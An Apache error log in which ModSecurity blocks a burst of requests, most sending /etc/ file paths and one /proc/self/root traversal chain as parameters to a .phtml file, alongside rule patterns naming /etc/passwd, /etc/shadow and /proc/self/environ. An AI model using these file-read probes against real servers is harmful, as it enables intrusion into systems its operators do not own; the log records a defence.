[Thu Mar 19 16:04:52.344576 2026] [:error] [pid 21563:tid 140411557287680] [client 57.141.18.28:57948] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI1Epm7ZmxKZTM4bZpNwAAA5Y"]
[Thu Mar 19 16:04:52.971645 2026] [:error] [pid 5816:tid 140411725141760] [client 57.141.18.92:57958] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI1JfmNfuxceSuAEK6DQAAAcI"]
[Thu Mar 19 16:04:53.987628 2026] [:error] [pid 7235:tid 140411716749056] [client 57.141.18.93:57986] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI1fqxLDW4GITHUkSNhQAAAQM"]
[Thu Mar 19 16:04:54.185624 2026] [:error] [pid 26799:tid 140411725141760] [client 57.141.18.96:58000] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI1ta6ubjKNq_cu4Z6qQAAA0I"]
[Thu Mar 19 16:04:55.830939 2026] [:error] [pid 27293:tid 140411557287680] [client 74.7.243.128:48486] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxI1_-YZRR_7pZ7nDKviAAAA9Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:04:57.733985 2026] [:error] [pid 26799:tid 140411725141760] [client 57.141.18.95:58100] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI2da6ubjKNq_cu4Z6rAAAA0I"]
[Thu Mar 19 16:04:58.675149 2026] [:error] [pid 26799:tid 140411590858496] [client 57.141.18.59:58140] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/favicon.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI2ta6ubjKNq_cu4Z6rgAAA1I"]
[Thu Mar 19 16:04:58.814423 2026] [:error] [pid 15826:tid 140411716749056] [client 57.141.18.0:58148] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI2uoXxyEfFpUF8f8xOwAAAUM"]
[Thu Mar 19 16:04:59.208918 2026] [:error] [pid 15826:tid 140411716749056] [client 57.141.18.85:58156] [client 57.141.18.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI2-oXxyEfFpUF8f8xPAAAAUM"]
[Thu Mar 19 16:05:00.231732 2026] [:error] [pid 21563:tid 140411716749056] [client 57.141.18.38:58186] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI3Epm7ZmxKZTM4bZpOwAAA4M"]
[Thu Mar 19 16:05:00.723756 2026] [:error] [pid 21219:tid 140411590858496] [client 57.141.18.18:58196] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI3PXLqtnMIWvjpaJDEAAAApI"]
[Thu Mar 19 16:05:04.003888 2026] [:error] [pid 8307:tid 140411624429312] [client 57.141.18.26:58256] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI4L-FhjpZGs9ba8qPRAAAAw4"]
[Thu Mar 19 16:05:05.073826 2026] [proxy_fcgi:error] [pid 21219:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:54464] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:05:06.625856 2026] [:error] [pid 5816:tid 140411658000128] [client 57.141.18.3:58320] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI4pfmNfuxceSuAEK6FQAAAco"]
[Thu Mar 19 16:05:08.635813 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.24:58386] [client 57.141.18.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI5OoXxyEfFpUF8f8xQAAAAU8"]
[Thu Mar 19 16:05:09.147274 2026] [:error] [pid 27293:tid 140411666392832] [client 57.141.18.115:58402] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI5f-YZRR_7pZ7nDKvjwAAA8k"]
[Thu Mar 19 16:05:10.827319 2026] [:error] [pid 27293:tid 140411666392832] [client 57.141.18.119:58460] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI5v-YZRR_7pZ7nDKvkwAAA8k"]
[Thu Mar 19 16:05:11.475649 2026] [:error] [pid 30077:tid 140411632822016] [client 57.141.18.58:58478] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI5_u8EFLIOrSqIpvN_AAAAk0"]
[Thu Mar 19 16:05:13.074256 2026] [:error] [pid 27293:tid 140411616036608] [client 57.141.18.40:58526] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI6f-YZRR_7pZ7nDKvlgAAA88"]
[Thu Mar 19 16:05:16.092319 2026] [:error] [pid 27293:tid 140411666392832] [client 57.141.18.67:58628] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI7P-YZRR_7pZ7nDKvmQAAA8k"]
[Thu Mar 19 16:05:17.435766 2026] [:error] [pid 8307:tid 140411733534464] [client 57.141.18.117:58662] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI7b-FhjpZGs9ba8qPTQAAAwE"]
[Thu Mar 19 16:05:17.616974 2026] [:error] [pid 17887:tid 140411624429312] [client 57.141.18.30:58670] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI7QkwaGbbGflqUZDv8AAAAM4"]
[Thu Mar 19 16:05:20.107826 2026] [:error] [pid 21219:tid 140411565680384] [client 57.141.18.16:58734] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI8PXLqtnMIWvjpaJDIAAAApU"]
[Thu Mar 19 16:05:21.719811 2026] [:error] [pid 7893:tid 140411666392832] [client 57.141.18.95:58748] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI8BCii7xarUs8iHYO6gAAAgk"]
[Thu Mar 19 16:05:21.720720 2026] [:error] [pid 15826:tid 140411716749056] [client 57.141.18.63:58750] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI8OoXxyEfFpUF8f8xSQAAAUM"]
[Thu Mar 19 16:05:21.723453 2026] [:error] [pid 19655:tid 140411708356352] [client 57.141.18.118:58774] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI8U1ujooLWdUDGy75swAAAEQ"]
[Thu Mar 19 16:05:21.723981 2026] [:error] [pid 5816:tid 140411641214720] [client 57.141.18.11:58762] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI8ZfmNfuxceSuAEK6IAAAAcw"]
[Thu Mar 19 16:05:21.793517 2026] [:error] [pid 17887:tid 140411641214720] [client 57.141.18.104:58780] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/virc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI8QkwaGbbGflqUZDv8QAAAMw"]
[Thu Mar 19 16:05:24.133777 2026] [:error] [pid 17887:tid 140411674785536] [client 57.141.18.87:58834] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI9AkwaGbbGflqUZDv8gAAAMg"]
